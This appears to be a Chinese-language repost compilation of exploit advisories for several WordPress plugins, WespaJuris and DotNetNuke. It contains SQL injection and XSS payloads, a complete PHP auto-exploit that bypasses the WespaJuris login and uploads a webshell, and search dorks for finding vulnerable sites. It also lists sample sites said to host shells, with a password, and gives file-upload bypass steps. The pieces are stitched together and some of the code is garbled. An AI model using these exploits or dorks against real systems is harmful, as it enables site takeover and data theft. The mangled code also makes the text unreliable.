下面是小编为大家准备的Wordpress插件Pay With Tweet = 1.1多个缺陷及修复漏洞预警(共含8篇),欢迎阅读借鉴。同时,但愿您也能像本文投稿人“壮士小沈”一样,积极向本站投稿分享好文章。
标题: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
作者: Gianluca Brindisi (gATbrindi.si @gbrindisi brindi.si/g/)
下载地址: downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
影响版本: 1.1
1) Blind SQL Injection in shortcode:
Short code parameter 'id' is prone to blind sqli,
you need to be able to write a post/page to exploit this:
[paywithtweet id=“1' AND 1=2”]
[paywithtweet id=“1' AND 1=1”]
2) Multiple XSS in pay.php
www.2cto.com /wp-content/plugins/pay-with-tweet.php/pay.php
After connecting to twitter:
?link=&22>[XSS]
After submitting the tweet:
?title=[XSS]&dl=[REDIRECT-TO-URL]%27)“>[XSS]
The final download link will be replaced with [REDIRECT-TO-URL]
POC: pay.php?link=%22>&title=&dl=brindi.si%27”>
标题: WordPress wp-auto plugin Blind SQL Injection
Vulnerability
作者: longrifle0x
软件: Wordpress
下载地址:wordpress.org/extend/plugins/wp-auto /
测试工具: SQLMAP
概述
Wordpress的插件wp-auto 被发现存在盲注问题
文件:
wp-content/plugins/wp-auto /modules/index.php
测试方法: id=-1; or 1=if
*测试*
www.badguest.cn /wp-content/plugins/wp-auto /modules/index.php[GET][id=-1][CURRENT_USER
www.badguest.cn /wp-content/plugins/wp-auto /modules/index.php[GET][id=-1][SELECT(CASE
WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)
www.badguest.cn /wp-content/plugins/wp-auto /modules/index.php[GET][id=-1][MID((VERSION()),1,6)
提供修复方案
wp-content/plugins/wp-auto /modules/index.php过滤该页面参数输入
/*
#标题spaJuris <= 3.0 auto exploit
# 作者: WhiteCollarGroup
# 网站: www.wespadigital.com.br/
# 下载地址 www.wespadigital.com.br/download/wespajuris_v3_0_.rar
# 影响版本: 3.0
# 测试平台: Apache Server
WespaJuris is a software for law firms.
Use this exploit to upload a webshell on vulnerable applications.
Usage:
php exploit.php
示例
$ php exploit.php
WespaJuris <= 3.0 exploit
Coded by WhiteCollarGroup
Type Ctrl + C for exit
Try “php exploit.php /about” for get info
[?] Target address (login form):
www.xxx.com/juris/
[?] Webshell path (in your computer):
C:wampwwwwebshell.php
[*] Login...
[*] Trying to add php on allowed file formats.
[*] Adding a new client.
[*] Getting new client ID
[!] Client ID: 30
[*] Adding a new process.
[*] Getting new process ID.
[!] New process ID: 37
[*] Adding new task.
[*] Getting new task ID
[*] New task ID: 16
[*] Adding new doc type.
[*] Trying to get new doc type ID.
[!] New doc type ID: 7
[*] Trying to upload file...
[*] Thinking about file address...
[!] Exploit complete.
[i] You have now a webshell in
Then, go to localhost/juris/clientdir/30/dl/webshell.php and see your webshell.
:: How this exploit works? Manually work.
~> Login bypass
On login form, enter “SQLi strings”:
Login: ' or 1=1-- wc
Pass: wcgroup
~> Configure file formats
Go to “CONFIGURAÇÕES”.
In “Extensões de documentos”, add “php”.
BEGIN Do it only if the system is blank
~> Add new client
Go to “CLIENTES E USUÁRIOS” > “adicionar”.
Add your own user.
~> Add new process
Go to “PROCESSOS” > “adicionar”.
Add your own process.
~> Add new task
Go to “PROCESSOS”.
Click on the process that you've created.
In “Tarefas”, click “Adicionar”.
~> Add new document type
Go to “DOCUMENTOS”.
Click “ADICIONAR/EDITAR TIPO DOCUMENTO”.
In “Adicionar Tipo de Documento” form, type anything and then, click “Adicionar”.
END Do it only if the system is blank
~> Get arbitrary file upload
Go to “DOCUMENTOS”.
Click “ADICIONAR DOCUMENTO”.
In “Título”, select a client and a process. Click “PROSSEGUIR”.
Select a task in “TAREFAS”, a document type in “Escolha um Tipo”.
In “Título do documento”, type anything.
Upload file in “Subir arquivo do Documento”. Leaves “Link para Documento na Internet” empty.
Click “Adicionar Novo Documento”.
Click “DOCUMENTOS” and click on the your webshell.
*/
set_time_limit(0);
echo “WespaJuris <= 3.0 auto exploitn”;
echo “Coded by WhiteCollarGroupn”;
echo “Type Ctrl + C for exitn”;
if((isset($argv[1])) AND ($argv[1]==“/about”)) {
echo “WhiteCollarGroupwww.xxx.com nwhitecollar_group@hotmail.comnTwitter/Facebook/Blogspot: WCollarGroupnirc.virtualife.com.br #wcgroupnn”;
exit;
} else {
echo “Try ”php $argv[0] /about“ for get infon”;
}
echo “n”;
if(!function_exists(“curl_init”)) {
echo “PHP CURL was not found on this system.n”;
echo “Linux(Debian-like apt system): Type the following command on shell:n”;
echo “# apt-get install php5-curlnn”;
echo “Unix: Edit your file php.ini and remove ”;“ from following line:n”;
echo “;extension=curl.sonn”;
echo “Windows: Edit your file php.ini and remove ”;“ from following line:n”;
echo “;extension=php_curl.dllnn”;
echo “Read more: www.php.net/manual/book.curl.phpnn”;
exit;
}
puts(“Target address (login form):”, “[?]”);
$target = trim(fgets(STDIN));
$target = preg_replace(“/index.php$/”, null, $target);
$target = preg_replace(“//$/”, null, $target);
puts(“Webshell path (in your computer):”, “[?]”);
do {
$webshell = trim(fgets(STDIN));
if(!file_exists($webshell)) echo “File not found!”;
} while(!file_exists($webshell));
$ch = curl_init();
// login
puts(“Login...”);
curl_setopt($ch, CURLOPT_URL, $target.“/process_login.php”);
curl_setopt($ch, CURLOPT_REFERER, $target);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, “do=login&username=”.urlencode(“' or 1=1-- wc”).“&password=wcgroup”);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/0725 Firefox/2.0.0.6”);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_COOKIEJAR, “wcgroup.txt”);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec($ch);
if(preg_match(“/Dadosde acesso incorretos, por favor tente novamente/”, $store)) {
puts(“Could not login.”, “[-]”);
echo “Make sure that the server uses a vulnerable version of WespaJuris.n”;
exit;
}
// config file format
$ext = end(explode(“.”, $webshell));
puts(“Trying to add $ext on allowed file formats.”);
curl_setopt($ch, CURLOPT_URL, $target.“/admin/main.php?pg=settings”);
curl_setopt($ch, CURLOPT_POSTFIELDS, “task=defsideset&new_serverdiff=0&new_dateformat=”.urlencode(“%Y/%c/%e”).“&new_extensions=”.urlencode(“$ext,php,jpg,jpeg,gif,png,psd,zip,ai,pdf,doc”));
curl_exec($ch);
// add client
puts(“Adding a new client.”);
curl_setopt($ch, CURLOPT_URL, $target.“/admin/main.php?pg=addclient”);
curl_setopt($ch, CURLOPT_POSTFIELDS, “task=addclient&company=WhiteCollarGroup&address1=www.wcgroup.host56.com&address2=whitecollar_group%40hotmail.com&city=%40WCollarGroup&state=facebook.com%2FWCollarGroup&zip=wcollargroup.blogspot.com&country=irc.virtualife.com.br+%23wcgroup&phone=WCGroup&phone_alt=This+was+a+auto+exploit&fax=We+did+not+hack+your+website”);
curl_exec($ch);
// get user ID
puts(“Getting new client ID”);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $target.“/admin/main.php?pg=addfiles”);
$store = curl_exec($ch);
$numbers = array();
preg_match_all(“/WhiteCollarGroup</option>/”, $store, $numbers);
$uid = $numbers[1][0];
puts(“Client ID: $uid”, “[!]”);
// add process
puts(“Adding a new process.”);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $target.“/admin/main.php?pg=addproj”);
curl_setopt($ch, CURLOPT_POSTFIELDS, “task=addproject&client_id=”.$uid.“&project_title=HackMySite&description=WCGroup+did+not+hacked+your+website.%0D%0AWCGroup+only+wrote+the+exploit+for+this+CMS+and+did+public+release.&startdate=08%2F06%2F2012&startdate_Month=7&miledate=08%2F06%2F2999&miledate_Month=7&findate=&findate_Month=&cost=0.00&status=Arquivado”);
$store = curl_exec($ch);
// get process ID
puts(“Getting new process ID.”);
$numbers = array();
preg_match_all(“/main.php?pg=projperms&pid=([0-9]*)/”, $store, $numbers);
$pid = $numbers[1][0];
puts(“New process ID: $pid”, “[!]”);
// add task
puts(“Adding new task.”);
curl_setopt($ch, CURLOPT_URL, $target.“/admin/main.php?pg=addtask”);
curl_setopt($ch, CURLOPT_POSTFIELDS, “task=addtask&clid=$uid&pid=$pid&client_id=main.php%3Fpg%3Daddtask%26clid%3D$uid&pid=$pid&task_title=Hacked+site&description=Sorry%2C+admin.&startdate=08%2F06%2F2012&startdate_Month=7&miledate=08%2F06%2F2999&miledate_Month=7&findate=&findate_Month=&status=Em+andamento¬es=Check+www.wcgroup.host56.com+for+details&tuid=0”);
$store = curl_exec($ch);
// get task id
puts(“Getting new task ID”);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $target.“/admin/main.php?pg=proj&clid=$uid&pid=$pid”);
$store = curl_exec($ch);
$numbers = array();
preg_match_all(“/main.php?pg=edittask&clid=$uid&pid=$pid&tid=([0-9]*)/”, $store, $numbers);
$taskid = $numbers[1][0];
puts(“New task ID: $taskid”);
// add doc type
puts(“Adding new doc type.”);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $target.“/admin/main.php?pg=filetypes”);
curl_setopt($ch, CURLOPT_POSTFIELDS, “task=addfiletype&file_type=hack”);
curl_exec($ch);
// get doc type id
puts(“Trying to get new doc type ID.”);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $target.“/admin/main.php?pg=filetypes”);
$store = curl_exec($ch);
$numbers = array();
preg_match_all(“/main.php?pg=filetypes&task=deltype&type_id=([0-9]*)/”, $store, $numbers);
$tid = $numbers[1][0];
puts(“New doc type ID: $tid”, “[!]”);
// upload file
puts(“Trying to upload file...”);
curl_setopt($ch, CURLOPT_POST, 1);
$post = array(
“task” => “addfile”,
“client_id” => $uid,
“from” => “step1”,
“project_id” => $pid,
“clid” => $uid,
“task_id” => $taskid,
“type_id” => $tid,
“file_title” => “wcgroup”,
“file” => “@$webshell”
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_exec($ch);
// make file address
puts(“Thinking about file address...”);
$fileaddr = $target.“/clientdir/$uid/dl/”.basename($webshell);
puts(“Exploit complete.”, “[!]”);
puts(“You have now a webshell in <$fileaddr>”, “[i]”);
function puts($str, 0=false) {
if(!0) 0 = “[*]”;
echo 0.“ ”.$str.“n”;
}
受影响版本:DotNetNuke 5.x
其他版本可能也存在该问题
[+] Application: DotNetNuke
[+] Affected Version: version prior to 5.x
[+] Vendor’s URL: www.dotnetnuke.com/
[+] Bug Type: Privilege escalation, Unauthorized access, Remote
[+] Risk Level: High
[+] No-exploit is required to make it easier than what it is..
[+] DotNetNuke Remote File Upload Vulnerability
[+] Add/User Account Security Failer Vulnerability
[+] Unauthorized Full access to the Server! :)
[+] Unauthorized Full access to the Files and Database!
[+] It Could Be Failure to revalidate file and folder permissions correctly for uploads.
[-*-] Quick Note:
[-] Vulnerability Details: DO NOT be a zone h lamer! just try to be more effective speard your shit
And hunte more idiots and root their machines! then hit them in the middle of no where by Saying
“Ph33r”
Access the upload panel Just dork:“inurl:ajaxfbs/browser.html”
Demo:
[1] www.badguest.cn/tramways/DesktopModules/FeedbackDesigner/ajaxfbs/browser.html
Aspx Shell with New user Privilege
www.badguest.cn/aspx.aspx
Password: admin
[2] www.badguest.cn/DesktopModules/FlashSlide/ajaxfbs/browser.html
Aspx Shell with New user Privilege
www.badguest.cn/aspx.aspx
Password: admin
[3] www.badguest.cn/DeskTopModules/Complete%20Feedback%20Designer/ajaxfbs/browser.html
Aspx Shell with New user Privilege
www.2cto.com/aspx.aspx
Password: admin
修复:
[*_*] The thanx belongs to the masters! Islamic Ghosts Team :)
影响版本: WordPress CevherShare 2.0 plugin
开发者: phpkode.com/
下载地址: phpkode.com/download/s/cevhershare.zip
测试平台: Ubuntu-Linux
缺陷代码页面:cevhershare/cevhershare-admin.php
测试:
www.2cto.com /wp-content/plugins/cevhershare/cevhershare-admin.php?id=[SQL-Injection]
$id = $_GET['id'] ? $_GET['id'] : $_POST['id'];
$pos = $_GET['pos'] ? $_GET['pos'] : $_POST['pos'];
$status = $_GET['status'] ? $_GET['status'] : $_POST['status'];
$task = $_GET['t'] ? $_GET['t'] : $_POST['t'];
$do = $_POST['do'];
if($do == “update-lang”){
$uplang = $_POST['update-lang'];
update_option('cevhershare_language',$uplang);
}www.2cto.com
if($id) $item = $wpdb->get_row(“SELECT * FROM ”.$wpdb->prefix.“cevhershare WHERE id=$id”);
if($do == 'update') $wpdb->query(“UPDATE ”.$wpdb->prefix.“cevhershare SET enabled='”.$_POST['enabled'].“', position='”.$_POST['position'].“', name='”.$_POST['name'].“', big='”.$_POST['big'].“', small='”.$_POST['small'].“' WHERE id='$id'”);
elseif($do == 'add') $wpdb->query(“INSERT INTO ”.$wpdb->prefix.“cevhershare (position, name, big, small) VALUES('”.$_POST['position'].“','”.$_POST['name'].“', '”.$_POST['big'].“', '”.$_POST['small'].“')”);
elseif($do == 'delete') $wpdb->query(“DELETE FROM ”.$wpdb->prefix.“cevhershare WHERE id=$id LIMIT 1”);
elseif($do == 'reset') cevhershare_reset;
elseif($do == 'settings'){
修复:过滤
其实就是一个fck的洞子,不过有条件的哦,要这个插件EditorMonkey
嘿嘿。
xxxx.com/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
upload shell.php.jpg
xxxx.com//UserFiles/shell.php.jpg
WordPress插件EditorMonkey存在上传漏洞,用WINDOWS
系统的请注意哦。这漏洞也就是fckeditor的上传洞。没必要在讲了,
大家在熟悉不过啦。还是自带的编辑器安全一点。
漏洞测试如下:
www.tmdsb.com/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
上传什么文件大家多懂的,
上传后文件在www.tmdsb.com/UserFiles/tmdsb.txt
谷歌搜索一下,好多用这插件的博客。
关键字:wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
editormonkey是wordpress的一个后台编辑器插件,
前好多天在inj3ct0r上公布了,也被相继转载了,个人觉得不是很完美。
都是直接上传得到一个x.php.jpg的shell。
完全可以用FCK的0day直接得到一个phpshell。
GOOGLE dork:inurl:”plugins/editormonkey”
EXP:
Upload a new file:
